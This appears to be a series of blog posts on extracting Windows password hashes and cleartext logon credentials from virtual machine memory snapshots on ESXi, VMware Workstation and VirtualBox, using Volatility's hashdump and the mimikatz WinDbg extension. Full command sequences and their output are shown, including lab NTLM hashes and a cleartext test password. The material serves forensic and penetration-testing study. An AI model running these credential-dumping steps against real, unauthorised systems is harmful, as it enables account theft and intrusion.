Memdumps, Volatility, Mimikatz, VMs – Part 8: ESXi Attacking Scenario – Volatility on ESXi

How cool is that: volatility standalone is running on esxi…
This scenario is only if you have access to the ESXi server via ssh.
Connecting to downloads.volatilityfoundation.org (173.61.222.9:80)
volatility_2.5.linux 100% |*******************************| 32039k  0:00:00 ETA
[root@localhost:/tmp] unzip volatility_2.5.linux.standalone.zip
Archive:  volatility_2.5.linux.standalone.zip
   creating: volatility_2.5.linux.standalone/
  inflating: volatility_2.5.linux.standalone/AUTHORS.txt
  inflating: volatility_2.5.linux.standalone/CREDITS.txt
  inflating: volatility_2.5.linux.standalone/LEGAL.txt
  inflating: volatility_2.5.linux.standalone/LICENSE.txt
  inflating: volatility_2.5.linux.standalone/README.txt
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x64
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x86
Find the .vmem files:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot3.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot2.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem
To the usual stuff:
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f “./Windows 7 x64-Snapshot1.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64]           Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f “./Windows 7 x64-Snapshot1.vmem” –profile=”Win7SP1x64″ hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 hashdump -f “./Windows 7
x64-Snapshot1.vmem” –profile=”Win7SP1x64″ -y 0xfffff8a000024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Create a snapshot
Yes, of course it is possible to create a snapshot on the cli.
[root@localhost:~] vim-cmd vmsvc/snapshot.create 5 “snap” “some comment” 1 0
And again:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem
[root@localhost:/tmp/volatility_2.5.linux.standalone] ./volatility_2.5_linux_x64 -f “/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002a4b0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002a4cd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-31 14:55:50 UTC+0000
     Image local date and time : 2016-01-31 15:55:50 +0100
and so on.
Links:

Memdumps, Volatility, Mimikatz, VMs – Part 7: ESXi Server

– I installed ESXi 6 in VMWare Workstation 12
– for this download the ESXi image
– choose “typical installation” when creating a new VM in VMWare Workstation
– for learning and testing this is awesome
esxia413004ae4cd1d083f7506beb40b91de
Screenshot of ESXi running in VMWare Workstation.
– I copied my Windows 7 VM from Workstation to ESXi.
– And made a snapshot like before (in part 6)
UPDATE: works also with .vmsn files
– Download the .vmem file from the datastore:
dsa9786e65987088417a34ba10c323eaf3
Or with the vSphere client:
dsvsphere58ca9c91c0c70b1e95ed1f3dfa2488ee
Then go on like in all the parts before:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f “Windows 7 x64-Snapshot1.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.5.win.standalone\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.e
xe -f “Windows 7 x64-Snapshot1.vmem” –profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\W
indows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f “Windows 7 x64-Snapshot1.vmem” –profile=Win7SP1x64 -y 0xfffff8a0
00024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08
9c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

Memdumps, Volatility, Mimikatz, VMs – Part 6: VMWare Workstation

The VM is running Windows 7.
From the running machine take the snapshot:
workstf1e79bd53e31d6944a7d87fe92f6aab4
Now it is possible to perform the volatility stuff directly with the .vmem file from the snapshot:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Documents\Virtua
l Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029f50a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029f6d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-29 17:48:24 UTC+0000
     Image local date and time : 2016-01-29 18:48:24 +0100
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmem” –profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a001ea6010 0x000000006a5f9010 \??\C:\Users\test\AppData\Local\Microsoft\
Windows\UsrClass.dat
0xfffff8a00000d250 0x000000002d4e6250 [no name]
0xfffff8a000024010 0x000000002d491010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000052010 0x000000002d53f010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a0000f6410 0x0000000024cbf410 \SystemRoot\System32\Config\DEFAULT
0xfffff8a000fec010 0x0000000026cbf010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a001003010 0x0000000023191010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001263010 0x000000001d2a5010 \SystemRoot\System32\Config\SECURITY
0xfffff8a0012f6010 0x000000001d138010 \SystemRoot\System32\Config\SAM
0xfffff8a0013ea010 0x0000000015820010 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a001439010 0x0000000015446010 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a001e0d010 0x00000000355c7010 \??\C:\Users\test\ntuser.dat
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7×64-Snapshot1.vmem” –profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a0012f
6010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
test:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
WinDBG
The method with windbg works too. But first the image needs to be converted. Download vmss2core (https://labs.vmware.com/flings/vmss2core).
Then convert the image:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>..\vmss2core-win.exe -W “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1.vmsn ” “C:\Users\dax\Documents\Virtual Machines\Windows 7 x64\Windows 7 x64-Snapshot1 .vmem”
vmss2core version 2452889 Copyright (C) 1998-2015 VMware, Inc. All rights reserv
ed.
… 10 MBs written.
… 20 MBs written.
… 30 MBs written.
… 40 MBs written.
… 50 MBs written.
… 60 MBs written.
… 70 MBs written.
… 80 MBs written.
… 90 MBs written.
… 100 MBs written.
Then just go on like in part 3:
Microsoft (R) Windows Debugger Version 6.3.9600.17336 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Users\dax\Downloads\volatility_2.5.win.standalone\memory.dmp]
Kernel Complete Dump File: Full address space is available
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x64
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.amd64fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0xfffff800`02804000 PsLoadedModuleList = 0xfffff800`02a49e90
Debug session time: Fri Jan 29 18:48:24.926 2016 (UTC + 1:00)
System Uptime: 0 days 0:05:16.423
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrnlmp.exe –
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll –
************* Symbol Loading Error Summary **************
Module name            Error
ntkrnlmp               The system cannot find the file specified
ntdll                  The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 80, {4f4454, 0, 0, 0}
*** ERROR: Module load completed but symbols could not be loaded for mssmbios.sys
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Either you specified an unqualified symbol, or your debugger   ***
***    doesn’t have full symbol information.  Unqualified symbol      ***
***    resolution is turned off by default. Please either specify a   ***
***    fully qualified symbol module!symbolname, or enable resolution ***
***    of unqualified symbols by typing “.symopt- 100”. Note that   ***
***    enabling unqualified symbol resolution with network symbol     ***
***    server shares in the symbol path may cause the debugger to     ***
***    appear to hang for long periods of time when an incorrect      ***
***    symbol name is typed or the network symbol server is down.     ***
***                                                                   ***
***    For some commands to work properly, your symbol path           ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: nt!_KPRCB                                     ***
***                                                                   ***
*************************************************************************
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y <symbol_path> argument when starting the debugger. *
*   using .sympath and .sympath+                                    *
*********************************************************************
Probably caused by : ntkrnlmp.exe
Followup: MachineOwner
———
kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
kd> !process 0 0 lsass.exe
NT symbols are incorrect, please fix symbols
kd> .SymFix
kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
………………….
Loading User Symbols
……………………………………………………….
……………………..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll –
************* Symbol Loading Error Summary **************
Module name            Error
vmtools                PDB not found : cache*
                       No data is available : SRV*http://msdl.microsoft.com/download/symbols
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
kd> !process 0 0 lsass.exe
PROCESS fffffa8003a7bb30
    SessionId: 0  Cid: 020c    Peb: 7fffffdb000  ParentCid: 01a4
    DirBase: 1e66e000  ObjectTable: fffff8a00123c6e0  HandleCount: 538.
    Image: lsass.exe
kd> .process /r /p fffffa8003a7bb30
Implicit process is now fffffa80`03a7bb30
Loading User Symbols
……………………………………………………
kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 430604 (00000000:0006920c)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 430574 (00000000:000691ee)
Session           : Interactive from 1
User Name         : test
Domain            : WIN-254BC5SVOCB
Logon Server      : WIN-254BC5SVOCB
Logon Time        : 29.01.2016 18:46:10
SID               : S-1-5-21-1016508660-14321150-529431041-1000
    msv :
     [00000003] Primary
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * LM       : 624aac413795cdc1aad3b435b51404ee
     * NTLM     : c5a237b7e9d8e708d8436b6148a25fa1
     * SHA1     : 39cfdb69532cff3336f08a83aac42524f41cd6e9
    tspkg :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    wdigest :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
    kerberos :
     * Username : test
     * Domain   : WIN-254BC5SVOCB
     * Password : test123
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old      c5a237b7e9d8e708d8436b6148a25fa1
       rc4_md4           c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_nt_exp   c5a237b7e9d8e708d8436b6148a25fa1
       rc4_hmac_old_exp  c5a237b7e9d8e708d8436b6148a25fa1
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOKALER DIENST
Domain            : NT-AUTORITÄT
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-19
    msv :
    tspkg : KO
    wdigest :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:31
SID               : S-1-5-20
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 48578 (00000000:0000bdc2)
Session           : UndefinedLogonType from 0
User Name         :
Domain            :
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               :
    msv :
    tspkg : KO
    wdigest : KO
    kerberos : KO
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-254BC5SVOCB$
Domain            : WORKGROUP
Logon Server      :
Logon Time        : 29.01.2016 18:43:29
SID               : S-1-5-18
    msv :
    tspkg : KO
    wdigest :
     * Username : WIN-254BC5SVOCB$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :
     * Username : win-254bc5svocb$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :
    masterkey :
     [00000000]
     * GUID      :    {f22e410f-f947-4e08-8f2a-8f65df603f8d}
     * Time      :    29.01.2016 17:43:30
     * MasterKey :    19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
    credman :

Windows Credentials and Memory Dumps – Part 5: Virtualbox & LM/NTLM Hashes

For this part I’m using the standalone version of volatility for windows. The goal is dumping LM/NTLM hashes from a  windows memory image.
When you have access to a host where virtual machines are running, but you do not have acces to the VMs itself, one possibility is to reboot the VM but starting an ISO and resetting or stealing the password that way. Of course this is very noisy and for a pentester there are better ways. With virtualbox you can dump the memory during runtime.
For this test I am running an old Windows XP SP2 box with virtualbox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm “WinXP_1” dumpvmcore –filename c:\Users\dax\Downloads\volatility_2.4.win.standalone\test.elf
From here it is the usual steps:
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : OSXPmemELF (Unnamed AS)
                     AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.4.win.standalone\volatility_2.4.win.standalone\test.elf)
                      PAE type : No PAE
                           DTB : 0x39000L
                          KDBG : 0x8054cde0L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-01-22 10:11:07 UTC+0000
     Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hivelist -f test.elf –profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
———- ———- —-
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\
Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUS
ER.DAT
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\NTUSER.DAT
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\NTUSER.DAT
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
For retreiving the hashes two values are needed in the next step
y=virtual location of system
s=virtual location of sam
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hashdump -f test.elf –profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Hilfeassistent:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
SUPPORT_388945a0:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
x:1004:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Links:

Windows Credentials and Memory Dumps – Part 4: Volatility & Mimikatz

For this test I installed everything in a WinXP VM. I followed these instructions:
… with only small changes, because I had a win32 machine.
